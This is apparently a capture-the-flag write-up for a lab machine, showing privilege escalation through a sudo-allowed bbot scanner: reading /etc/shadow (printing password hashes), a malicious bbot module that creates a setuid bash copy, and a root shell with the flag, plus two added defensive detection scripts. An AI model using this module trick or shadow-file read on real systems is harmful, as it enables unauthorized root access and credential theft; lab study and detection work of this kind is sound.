[VERB] _scan_ingress: Target: DNS_NAME("b23be622c570cb02f01e28b4e38997ef", module=TARGET, tags={'distance-1', 'target'})
[SCAN]              	questionable_joyce (SCAN:2a008a5e1eacbc6b81c464cf7b28674272c487d6)	TARGET	(in-scope, target)
[VERB] DNS error or timeout for A query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.106 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for AAAA query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.107 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for CNAME query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.108 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 5.000 seconds
[INFO] questionable_joyce: Modules running (incoming:processing:outgoing) dnsresolve(0:1:0)
[INFO] questionable_joyce: Events produced so far: SCAN: 1
[INFO] questionable_joyce: No events in queue (9 processed in the past 15 seconds)
[VERB] DNS error or timeout for SRV query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.104 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.998 seconds
[VERB] DNS error or timeout for MX query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.103 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.998 seconds
[VERB] DNS error or timeout for NS query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.103 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for SOA query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.102 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[VERB] DNS error or timeout for TXT query "b23be622c570cb02f01e28b4e38997ef" (2 so far): The resolution lifetime expired after 5.102 seconds: Server Do53:8.8.8.8@53 answered The DNS operation timed out after 4.999 seconds
[DNS_NAME_UNRESOLVED]	b23be622c570cb02f01e28b4e38997ef	TARGET	(a-error, aaaa-error, cname-error, in-scope, mx-error, ns-error, soa-error, srv-error, target, txt-error, unresolved)
[INFO] Finishing scan
[VERB] Completed finish()
[VERB] Completed final finish()
[SCAN]              	questionable_joyce (SCAN:2a008a5e1eacbc6b81c464cf7b28674272c487d6)	TARGET	(in-scope)
[VERB] False
[VERB] True
[SUCC] Scan questionable_joyce completed in 21 seconds with status FINISHED
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | Module     | Produced   | Consumed                  |
[INFO] aggregate: +============+============+===========================+
[INFO] aggregate: | dnsresolve | 0          | 1 (1 DNS_NAME)            |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | cloudcheck | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | speculate  | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[VERB] aggregate: Wrote scan-stats to /root/.bbot/scans/questionable_joyce/scan-stats-table-20250303_0855_54.txt
[INFO] output.csv: Saved CSV output to /root/.bbot/scans/questionable_joyce/output.csv
[INFO] output.json: Saved JSON output to /root/.bbot/scans/questionable_joyce/output.json
[INFO] output.txt: Saved TXT output to /root/.bbot/scans/questionable_joyce/output.txt
[VERB] EngineClient DNSHelper: shutting down...
[VERB] EngineServer DNSEngine got shutdown signal
[VERB] EngineServer DNSEngine: shutting down...
[VERB] EngineServer DNSEngine: finished shutting down
[INFO] Saved word cloud (17 words) to /root/.bbot/scans/questionable_joyce/wordcloud.tsv
graphasm@cypher:~$

The same can be done for the /etc/shadow file, although the command has to be run several times because it only shows one line per run.

graphasm@cypher:~$ sudo bbot -y -t /etc/shadow -m httpx --force -v
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Reading targets from file: /etc/shadow
[VERB] Creating events from 36 targets
[WARN] Unable to autodetect event type from "graphasm:$y$j9T$lDLyqZAxCXhX1EB3v01Zl.$C0XwosQvBM.5sAPbHd8oyAK0e8lg0GX5YJHb7qImQV7:20004:0:99999:7:::"
graphasm@cypher:~$ sudo bbot -y -t /etc/shadow -m httpx --force -v
# [...] snip [...]
graphasm@cypher:~$ sudo bbot -y -t /etc/shadow -m httpx --force -v
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Reading targets from file: /etc/shadow
[VERB] Creating events from 36 targets
[WARN] Unable to autodetect event type from "root:$y$j9T$ianAmmc1w6VSodw.1fzgk/$3DenO5YJ1VBvE1VekRL79v6bN00fhcbA59zeeLciY67:20133:0:99999:7:::"
graphasm@cypher:~$

Custom Module

bbot is built around modules; according to its documentation, it is possible to write and run your own modules by declaring them in a preset. We used the example module to make a copy of bash and give it SUID privileges.

# /dev/shm/mod.py
from bbot.modules.base import BaseModule
import os

class privesc(BaseModule):    
    os.system("cp /bin/bash /bin/sc; chmod u+s /bin/sc;") 
    watched_events = ["DNS_NAME"] # watch for DNS_NAME events
    produced_events = ["WHOIS"] # we produce WHOIS events
    flags = ["passive", "safe"]
    meta = {"description": "Copy bash and gives SUID to it"}
    options = {"api_key": ""} # module config options
    options_desc = {"api_key": "Key"}
    per_domain_only = True # only run once per domain

    base_url = "http://localhost/"

    # one-time setup - runs at the beginning of the scan
    async def setup(self):
        return None, ""    

We create a preset that specifies the module directory and the module we created.

# preset.yml
description: Privesc
module_dirs:
  - /dev/shm
modules:
  - mod

We run bbot with the preset and a target.

graphasm@cypher:/dev/shm$ sudo bbot -t evilcorp.com -p ./preset.yml --force -y
  ______  _____   ____ _______
 |  ___ \|  __ \ / __ \__   __|
 | |___) | |__) | |  | | | |
 |  ___ <|  __ <| |  | | | |
 | |___) | |__) | |__| | | |
 |______/|_____/ \____/  |_|
 BIGHUGE BLS OSINT TOOL v2.1.0.4939rc

www.blacklanternsecurity.com/bbot

[INFO] Scan with 1 modules seeded with 1 targets (1 in whitelist)
[WARN] Failed to load unknown module "mod"
[ERRR] Failed to load 1 scan modules: mod
[INFO] Loaded 5/5 internal modules (aggregate,cloudcheck,dnsresolve,excavate,speculate)
[INFO] Loaded 5/5 output modules, (csv,json,python,stdout,txt)
[INFO] internal.excavate: Compiling 11 YARA rules
[INFO] internal.speculate: No portscanner enabled. Assuming open ports: 80, 443
[SUCC] Setup succeeded for 12/12 modules.
[SUCC] Starting scan dramatic_glenn
[SCAN]              	dramatic_glenn (SCAN:b22e1a3a93afdc4085d7413440e5e03017508dcb)	TARGET	(in-scope, target)
[INFO] dramatic_glenn: Modules running (incoming:processing:outgoing) dnsresolve(0:1:0)
[INFO] dramatic_glenn: Events produced so far: SCAN: 1
[INFO] dramatic_glenn: No events in queue (9 processed in the past 15 seconds)
[DNS_NAME_UNRESOLVED]	evilcorp.com	TARGET	(a-error, aaaa-error, cname-error, domain, in-scope, mx-error, ns-error, soa-error, srv-error, target, txt-error, unresolved)
[INFO] Finishing scan
[SCAN]              	dramatic_glenn (SCAN:b22e1a3a93afdc4085d7413440e5e03017508dcb)	TARGET	(in-scope)
[SUCC] Scan dramatic_glenn completed in 21 seconds with status FINISHED
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | Module     | Produced   | Consumed                  |
[INFO] aggregate: +============+============+===========================+
[INFO] aggregate: | dnsresolve | 0          | 1 (1 DNS_NAME)            |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | cloudcheck | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] aggregate: | speculate  | 0          | 1 (1 DNS_NAME_UNRESOLVED) |
[INFO] aggregate: +------------+------------+---------------------------+
[INFO] output.csv: Saved CSV output to /root/.bbot/scans/dramatic_glenn/output.csv
[INFO] output.json: Saved JSON output to /root/.bbot/scans/dramatic_glenn/output.json
[INFO] output.txt: Saved TXT output to /root/.bbot/scans/dramatic_glenn/output.txt
[INFO] Saved word cloud (4 words) to /root/.bbot/scans/dramatic_glenn/wordcloud.tsv
graphasm@cypher:/dev/shm$

pspy shows our command being executed as root.

2025/03/02 03:59:17 CMD: UID=0     PID=84894  | 
2025/03/02 03:59:17 CMD: UID=0     PID=84895  | /opt/pipx/venvs/bbot/bin/python /usr/local/bin/bbot -t evilcorp.com -p ./preset.yml --force -v -y 
2025/03/02 03:59:17 CMD: UID=0     PID=84896  | cp /bin/bash /bin/sc 
2025/03/02 03:59:17 CMD: UID=0     PID=84897  | sh -c -- cp /bin/bash /bin/sc; chmod u+s /bin/sc; 
2025/03/02 03:59:18 CMD: UID=0     PID=84898  | /opt/pipx/venvs/bbot/bin/python -c from multiprocessing.spawn import spawn_main; spawn_main(tracker_fd=6, pipe_handle=22) --multiprocessing-fork
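
The process records above, together with the earlier `-t /etc/shadow` run, are enough to build a detection. The following is an added example, not part of the original write-up or of bbot: it scans pspy-style lines for root-run bbot invocations whose target is a local file or whose preset comes from outside a trusted directory, and for root adding a setuid bit. `TRUSTED_PRESET_DIR` is a hypothetical path, and the last two sample records are constructed.

```python
import posixpath
import re
import shlex

# pspy-style record: "<date> <time> CMD: UID=<n> PID=<n> | <command line>"
LINE_RE = re.compile(r"CMD: UID=(\d+)\s+PID=(\d+)\s+\|\s*(.*)$")
# chmod that adds setuid/setgid, symbolic (u+s) or octal (4755)
SETID_RE = re.compile(r"\bchmod\s+(?:-\S+\s+)*(?:[ugoa]*[+=][rwxXt]*s|[2467][0-7]{3}\b)")
# Assumption: presets are only expected from this root-owned directory (hypothetical path).
TRUSTED_PRESET_DIR = "/etc/bbot/presets/"

def is_bbot(argv):
    """True when the program, or the script handed to an interpreter, is bbot."""
    return any(a == "bbot" or a.endswith("/bbot") for a in argv[:2])

def findings(lines):
    """Return (pid, reason) for root-run commands that match the steps shown above."""
    out = []
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m.group(1) != "0":          # only processes running as UID 0
            continue
        pid, cmd = int(m.group(2)), m.group(3).strip()
        if SETID_RE.search(cmd):
            out.append((pid, "setuid/setgid bit added by root"))
        try:
            argv = shlex.split(cmd)
        except ValueError:                      # unbalanced quotes in the record
            continue
        if not is_bbot(argv):
            continue
        for flag, value in zip(argv, argv[1:]):  # checks the value right after each flag
            if flag in ("-t", "--targets") and value.startswith("/"):
                out.append((pid, "bbot target is a local file: " + value))
            looks_like_path = "/" in value or value.endswith((".yml", ".yaml"))
            trusted = posixpath.normpath(value).startswith(TRUSTED_PRESET_DIR)
            if flag in ("-p", "--preset") and looks_like_path and not trusted:
                out.append((pid, "bbot preset from untrusted path: " + value))
    return out

# First three records are taken from the pspy output above; the last two are constructed.
SAMPLE = [
    "2025/03/02 03:59:17 CMD: UID=0     PID=84895  | /opt/pipx/venvs/bbot/bin/python /usr/local/bin/bbot -t evilcorp.com -p ./preset.yml --force -v -y ",
    "2025/03/02 03:59:17 CMD: UID=0     PID=84896  | cp /bin/bash /bin/sc ",
    "2025/03/02 03:59:17 CMD: UID=0     PID=84897  | sh -c -- cp /bin/bash /bin/sc; chmod u+s /bin/sc; ",
    "2025/03/02 04:10:00 CMD: UID=0     PID=90001  | /usr/local/bin/bbot -y -t /etc/shadow -m httpx --force -v",
    "2025/03/02 04:11:00 CMD: UID=1000  PID=90002  | chmod u+s /home/graphasm/x",
]
```

Named presets passed to `-p` are not reported; only values that look like file paths outside the trusted directory are.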

Shell

We run the bash copy as a privileged shell, obtaining root and the root.txt flag.

graphasm@cypher:/dev/shm$ ls /bin/sc
/bin/sc
graphasm@cypher:/dev/shm$ /bin/sc -p
sc-5.2# id
uid=1000(graphasm) gid=1000(graphasm) euid=0(root) groups=1000(graphasm)
sc-5.2# cd /root
sc-5.2# ls
root.txt
sc-5.2# cat root.txt 
8b65fc179421f39a2d9da8969c57ddaf
sc-5.2#
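
A setuid copy of a shell such as `/bin/sc` keeps the same bytes as the original binary, so it can be found by content even under another name. The following is an added example, not part of the original write-up: it walks the given directories and reports setuid/setgid regular files whose SHA-256 equals that of a known shell. The default shell list is an assumption, and `demo()` runs on a constructed temporary tree.

```python
import hashlib
import os
import shutil
import stat
import tempfile

def sha256(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def suid_shell_copies(roots, shells=("/bin/bash", "/bin/sh", "/bin/dash")):
    """Return setuid/setgid regular files under roots whose content equals a shell."""
    shell_hashes = {sha256(s) for s in shells if os.path.isfile(s)}
    hits = []
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    mode = os.lstat(path).st_mode   # lstat: do not follow symlinks
                    if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
                        continue
                    if sha256(path) in shell_hashes:
                        hits.append(path)
                except OSError:                     # unreadable or vanished file
                    continue
    return sorted(hits)

def demo():
    """Constructed tree: stand-in shell, setuid copy, plain copy, unrelated setuid file."""
    with tempfile.TemporaryDirectory() as d:
        shell = os.path.join(d, "fake-bash")
        with open(shell, "wb") as f:
            f.write(b"constructed stand-in for /bin/bash\n")
        sc, plain, other = (os.path.join(d, n) for n in ("sc", "plain", "other"))
        shutil.copy(shell, sc)
        os.chmod(sc, 0o4755)                        # setuid bit set, as chmod u+s does
        shutil.copy(shell, plain)                   # copy without setuid: not reported
        with open(other, "wb") as f:
            f.write(b"different content\n")
        os.chmod(other, 0o4755)                     # setuid but not a shell: not reported
        return [os.path.basename(p) for p in suid_shell_copies([d], shells=[shell])]
```

On a real host, run `suid_shell_copies` as root over local filesystems such as `/bin`, `/usr`, `/tmp` and `/dev/shm`. A modified or rebuilt shell will not match by hash, so the full setuid inventory should also be compared against the package baseline.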

Dump Hashes

We read the /etc/shadow file.


Dany Sucuc
WRITTEN BY
sckull